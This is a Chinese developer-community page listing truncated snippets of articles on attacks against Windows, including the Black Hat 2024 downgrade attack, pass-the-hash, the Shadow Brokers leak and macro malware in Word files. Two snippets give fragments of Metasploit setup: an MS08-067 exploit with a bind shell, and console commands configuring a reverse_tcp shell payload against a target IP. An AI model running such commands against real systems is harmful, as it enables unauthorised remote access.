文章 2024-08-10 来自:开发者社区

降级攻击可“复活”数以千计的Windows漏洞

在本周举行的黑帽大会(Black Hat 2024)上,安全研究员Alon Leviev曝光了一个微软Windows操作系统的“超级漏洞”,该漏洞使得攻击者可以利用微软更新进程实施降级攻击,“复活”数以千计的微软Windows漏洞,即便是打满补丁的Windows11设备也将变得千疮百孔,脆弱不堪。 把微软的更新服务变成“超级木马” 在与微软协调后,Leviev在黑帽大会上公布了W...

降级攻击可“复活”数以千计的Windows漏洞
文章 2022-02-17 来自:开发者社区

kali下利用smb漏洞实现DDOS(SMBLoris攻击消耗windows RAM)

版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396567 参考:https://v.qq.com/x/page...

文章 2022-02-16 来自:开发者社区

Kali linux 2016.2(Rolling)的利用MSF攻击windows小案例(exploits + payloads + taegets)(博主推荐)

 本博文举的例,是利用远程溢出windows服务器。    Exploit/windows/smb/ms08_067_netapi。    Payload :    windows/shell/bind_tcp   Target:  windows 2000          以下是受害者机器情况。       &nb...

Kali linux 2016.2(Rolling)的利用MSF攻击windows小案例(exploits + payloads + taegets)(博主推荐)
文章 2022-02-16 来自:开发者社区

Back Track 5 之 漏洞攻击 && 密码攻击 && Windows下渗透工具

网络漏洞攻击工具 Metasploit   先msfupdate升级:   然后选择msfconsole:   接下来: set LHOST 本机IP地址 setLPORT 4445 setg PAYLOAD windows/shell/reverse_tcp setg RHOST 目标IP地址 setg port 21 set target 随意数字 exploit ...

Back Track 5 之 漏洞攻击 && 密码攻击 && Windows下渗透工具
文章 2022-02-16 来自:开发者社区

攻击DNS之利用顶级域名配置错误监控Windows域用户

前言 为了寻找新的有趣的域名解析系统漏洞,我决定查看各种各样的顶级域名,并分析它们的错误配置,经过一些初步的搜索,我发现有一个很好的开源服务工具,可以帮助DNS管理员扫描它们的域名系统,察看是否存在错误配置,这就是瑞典互联网基金会开发的DNScheck工具,该工具会高亮显示出各种各样的奇怪DNS配置错误,这种错误例如:有一个权威名称服务器列表,一个域名的权威名称服务器和该名称服务器在上一级顶级名....

文章 2022-02-16 来自:开发者社区

攻击Windows平台NVIDIA驱动程序

前言 现代图形驱动程序是十分复杂的,它提供了大量有希望被利用的攻击面,可以使用具有访问GPU权限的进程(比如Chrome的GPU进程)进行提权和沙箱逃逸。在这篇文章中,你们将看到如何攻击NVIDIA内核模式的Windows驱动程序,以及在此期间我发现的一些bug。我的这项研究是Project Zero的一个20%项目的一部分,在此期间我总共发现了16个漏洞。 内核WDDM接口 图形驱动程序的...

文章 2022-02-16 来自:开发者社区

从hash传递攻击谈相关Windows安全机制

前言 path-the-hash,中文直译过来就是hash传递,在域中是一种比较常用的攻击方式。在网上所找到的资料,大多数是介绍如何实现此类攻击,但对于它背后所隐藏的关于Windows安全机制的一些知识,却鲜有探讨。本文的目的就是从pass-the-hash这一古老的话题切入,由攻击过程中Windows的行为引出它背后的安全机制,让大家对Windows有更深入的了解。 攻击方式 通常来说,pas....

文章 2022-02-16 来自:开发者社区

黑客公布无数种攻击 Windows 的方法,对我们有什么影响

  本文作者:李勤,雷锋网网络安全专栏作者。 4月14日晚上,网络安全研究员余弦在23点16分发了一条朋友圈: 方程式组织又被 Shadow Brokers 泄了一堆工具,都过去六个小时了,没人关注了呀。 这一晚静悄悄地过去了,4月15日(周六)一大早,雷锋网发现,网络安全圈简直要炸锅了! 原来,这事影响真的挺大的。 事情是这样的,“The ShadowBrokers”是一个神...

黑客公布无数种攻击 Windows 的方法,对我们有什么影响
文章 2022-02-16 来自:开发者社区

word文档都能带毒 可攻击Windows和macOS

一般来讲,网络攻击最多的可能来自于网页或者链接,可是近日在网上出现了利用宏功能漏洞来携带恶意程序的word文档,当使用Windows或者macOS设备打开后就可能会自动下载一些恶意的程序。   据外媒报道,Office办公套件中的宏功能经常会被攻击者利用,一些黑客常会用其入侵或感染系统,而这种新型的攻击手段就是利用了这种手段,基于VBA(Visual basic for Applicat...

word文档都能带毒 可攻击Windows和macOS
文章 2022-02-16 来自:开发者社区

黑客9万美元兜售可攻击Windows所有版本的零日漏洞

一名黑客公然在网上叫卖可攻击Windows所有版本的零日漏洞,售价9万美元。该价格在5月23日更新,此前,黑客的定价更高,为9.5万美元。另外,他还在网上上传了两段该零日漏洞攻击的演示视频。该名黑客表示,这个漏洞将只卖给一个人,买家将能获取漏洞的源代码、完整的演示视频、微软Visual Studio 2005项目文件以及未来的更新,支付方式为比特币。 这个卖家特别强调,该漏洞可以在Windows....

本页面内关键词为智能算法引擎基于机器学习所生成,如有任何问题,可在页面下方点击"联系我们"与我们沟通。

开发与运维

集结各类场景实战经验,助你开发运维畅行无忧

+关注